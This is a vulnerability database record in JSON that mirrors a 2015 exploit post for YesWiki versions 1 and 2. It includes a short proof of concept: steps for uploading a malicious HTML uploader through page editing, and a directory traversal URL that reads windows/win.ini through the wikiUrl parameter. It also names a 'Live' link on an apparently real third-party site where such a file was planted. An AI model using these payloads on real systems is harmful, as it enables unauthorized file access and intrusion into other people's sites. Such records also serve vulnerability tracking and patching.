Description
YesWiki versions 1 and 2 suffer from remote arbitrary file upload and directory traversal vulnerabilities.
{"id": "1337DAY-ID-24718", "type": "zdt", "bulletinFamily": "exploit", "title": "YesWiki 1 / 2 File Upload / Directory Traversal Vulnerabilities", "description": "YesWiki versions 1 and 2 suffers from remote arbitrary file upload and directory traversal vulnerabilities.", "published": "2015-12-13T00:00:00", "modified": "2015-12-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/24718", "reporter": "indoushka", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-20T00:14:40", "viewCount": 9, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "sourceHref": "https://0day.today/exploit/24718", "sourceData": "0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \r\n| # Title : yeswiki v1+2 unrestricted file upload Vulnerability\r\n| # Author : indoushka\r\n| # email : [email\u00a0protected]\r\n| # Dork : (>^_^)> Galope sous YesWiki <(^_^<)\r\n| # Tested on: windows 8.1 Fran\u00e7ais V.(Pro)\r\n| # Download : http://www.yeswiki.net/\r\n========================================================================\r\n\r\npoc:\r\n\r\nI- unrestricted file upload :\r\n\r\nCreat or edit pages and join your Ev!l uploader .html\r\ngo to http://127.0.0.1/yeswiki/files/diaporama/ 3v!l-up.html or http://127.0.0.1/yeswiki/files/\r\n\r\nLive : http://maraichagesolvivant.org/files/PagePrincipale_up_20151203204715_20151207164247.html_\r\n\r\nII - Directory Traversal :\r\n\r\nhttp://127.0.0.1/yeswiki/wakka.php?wikiUrl=../../../../../../../../../../windows/win.ini\r\n\r\nGreetz : \r\njericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/\r\nHussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be\n\n# 0day.today [2018-03-19] #", "_state": {"dependencies": 1645293656, "score": 1659766679, "epss": 
1678811959}}